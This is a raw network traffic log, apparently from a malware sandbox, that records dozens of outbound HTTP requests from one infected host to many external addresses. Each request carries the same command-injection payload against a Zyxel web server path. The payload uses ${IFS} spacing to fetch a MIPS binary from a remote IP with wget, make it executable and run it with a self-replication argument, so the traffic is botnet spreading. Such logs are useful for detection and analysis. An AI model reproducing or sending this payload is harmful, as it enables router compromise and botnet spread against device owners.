                                                Jan 29, 2024 07:08:07.731197119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9266192.168.2.234712066.119.132.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731236935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9267192.168.2.2347372163.100.226.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731262922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9268192.168.2.2349694141.144.111.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731302023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9269192.168.2.234863493.113.246.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731333971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9270192.168.2.2356680142.53.178.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731365919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9271192.168.2.2342386146.165.207.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731403112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9272192.168.2.2336072219.180.239.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731452942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9273192.168.2.2354108160.162.119.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731475115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9274192.168.2.2334250162.118.79.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731519938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9275192.168.2.235651854.140.160.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731533051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9276192.168.2.2345938168.180.182.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731584072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9277192.168.2.2349290147.180.185.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731606960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9278192.168.2.234640095.200.92.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731667995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9279192.168.2.2358864194.19.183.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731714964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9280192.168.2.2337092202.254.100.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731739044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9281192.168.2.2348520163.177.128.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731791973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9282192.168.2.234424065.117.199.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731817007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9283192.168.2.2358618194.16.149.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731885910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9284192.168.2.234222617.29.186.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731911898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9285192.168.2.236031067.177.12.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.731961012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9286192.168.2.233909671.13.30.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732011080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9287192.168.2.2354968171.13.143.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732052088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9288192.168.2.234647058.138.172.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732101917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9289192.168.2.23377848.173.156.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732131958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9290192.168.2.2347344163.198.81.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732176065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9291192.168.2.2337210105.187.121.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732207060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9292192.168.2.234517887.25.187.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732242107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9293192.168.2.234651677.111.250.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732276917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9294192.168.2.234071246.236.240.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732307911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9295192.168.2.2350824163.7.167.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732337952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9296192.168.2.2342916186.205.43.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732371092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9297192.168.2.2333980210.157.231.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732435942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9298192.168.2.2338404223.112.54.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732461929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9299192.168.2.2341356202.27.83.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732507944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9300192.168.2.234291013.57.40.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732527018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9301192.168.2.2339002198.13.231.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732579947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9302192.168.2.235610646.116.218.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732603073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9303192.168.2.2343076198.100.127.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732640028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9304192.168.2.2333912199.90.197.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732692957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9305192.168.2.2351046166.119.86.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732732058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9306192.168.2.2338106136.176.191.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732783079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9307192.168.2.2349480203.52.183.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732830048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9308192.168.2.235042685.187.50.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732848883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9309192.168.2.234640484.31.36.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732901096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9310192.168.2.23330342.246.28.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732927084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9311192.168.2.2348202109.224.242.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.732954025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9312192.168.2.2356704140.34.12.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733021021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9313192.168.2.23594702.179.212.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733063936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9314192.168.2.235541820.158.14.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733091116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9315192.168.2.2342352221.42.62.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733139992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9316192.168.2.2359930211.120.150.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733169079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9317192.168.2.2358142186.187.128.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733196974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9318192.168.2.233758439.138.237.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733249903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9319192.168.2.234370099.255.115.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733282089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9320192.168.2.2337828146.223.52.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733316898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9321192.168.2.233574442.99.214.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733345985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9322192.168.2.233287872.216.68.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733395100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9323192.168.2.2356520118.27.196.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733460903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9324192.168.2.233599044.199.134.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733494043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9325192.168.2.233704851.74.239.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733540058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9326192.168.2.2344624157.221.173.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733580112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9327192.168.2.234632839.23.166.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733638048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9328192.168.2.2358094203.180.14.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.733663082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9329192.168.2.235284487.89.187.7443
                                                TimestampBytes transferredDirectionData
